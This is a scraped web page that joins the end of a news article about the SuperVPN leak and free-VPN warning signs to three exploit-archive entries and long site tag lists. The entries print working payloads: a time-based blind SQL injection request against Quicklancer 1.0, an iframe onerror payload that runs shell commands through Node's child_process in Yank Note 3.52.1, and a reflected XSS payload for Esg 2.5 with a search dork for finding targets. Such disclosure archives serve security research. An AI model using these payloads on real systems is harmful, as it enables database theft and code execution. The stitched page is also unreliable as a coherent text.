In the report published by vpnMentor, Fowler noticed that SuperVPN’s customer support emails were linked to StormVPN, Luna VPN, RocketVPN and GhostVPN. Additionally, references to each of these VPN providers were observed within the database.

Type of leaked data (VPNmentor)

Although there is no way to confirm that they’re all owned by the same company, it would not come as a surprise if that were the case. The proliferation of unreliable VPN apps can be attributed to profit-driven developers seeking to capitalize on the growing demand for privacy and security.

The VPN industry has become highly lucrative, with millions of users worldwide seeking reliable solutions to safeguard their online presence. In this climate, some developers prioritize monetary gains over user safety, focusing on quick and inexpensive development, marketing, and distribution of VPN apps.

Therefore, for a single company to produce multiple VPN applications with different names and slightly varying user experiences would not be unlikely since that would allow it to cast a wider net over the users scouring for a suitable VPN provider.

When opting for a free VPN service, it’s essential to exercise caution and consider certain red flags that indicate potential risks. These include:

1.  Unclear data collection and usage policies: Verify that the VPN service doesn’t log your internet activity to avoid the risk of data being sold to advertisers or third parties.
2.  Lack of transparency: Pay attention to the absence of an “About Us” section on the VPN provider’s official website, as this can indicate a lack of information about who handles your data.
3.  DNS-leak protection: Ensure that the VPN service offers DNS-leak protection to prevent your internet service provider from seeing your online activities.
4.  Weak encryption: Avoid VPNs that offer encryption weaker than 128-bit or 256-bit AES, as this increases the risk of your data being compromised.
5.  Negative reviews: Read user reviews and consult reputable review sites to gauge the experiences and concerns of other users before choosing a VPN service.

The proliferation of VPN apps presents both opportunities and challenges for users seeking privacy and security in their online activities. While the market offers a wide range of reliable VPN solutions, the rising number of unreliable apps calls for caution and informed decision-making.

By understanding the factors contributing to the excess of VPN apps, identifying the risks associated with their usage, and implementing measures to mitigate these risks, users can make more informed choices to protect their online privacy and security.

**RELATED ARTICLES**

1.  Beware! This malware hides behind free VPNs
2.  What is an OSINT Tool – Best OSINT Tools 2023
3.  Leaked database of UFO VPN destroyed by hackers
4.  Mullvad VPN and Tor Project Release Mullvad Browser
5.  VPN firm that claims 0 logs policy leaks 20m user logs

Free VPN Service SuperVPN Exposes 360 Million User Records

Quicklancer version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Quicklancer v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135# Demo Site: https://quicklancer.bylancer.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /php/user-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhostCookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;quickjob_view_counted=31; Quick_lang=arabicContent-Length: 93Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-aliveaction=searchStateCountry&dataString=deneme### Parameter & Payloads ###Parameter: dataString (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Quicklancer 1.0 SQL Injection

Yank Note version 3.52.1 suffers from an arbitrary code execution vulnerability.

    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution# Date: 2023-04-27# Exploit Author: 8bitsec# CVE: CVE-2023-31874# Vendor Homepage: yank-note.com# Software Link: https://github.com/purocean/yn# Version: 3.52.1# Tested on: [Ubuntu 22.04 | Mac OS 13]Release Date: 2023-04-27Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacementTechnical Details & Description:A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload.Mac:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">Ubuntu:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">Opening the file in Yank Note will auto execute the Calculator application.

Yank Note 3.52.1 Arbitrary Code Execution

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Tag

#apple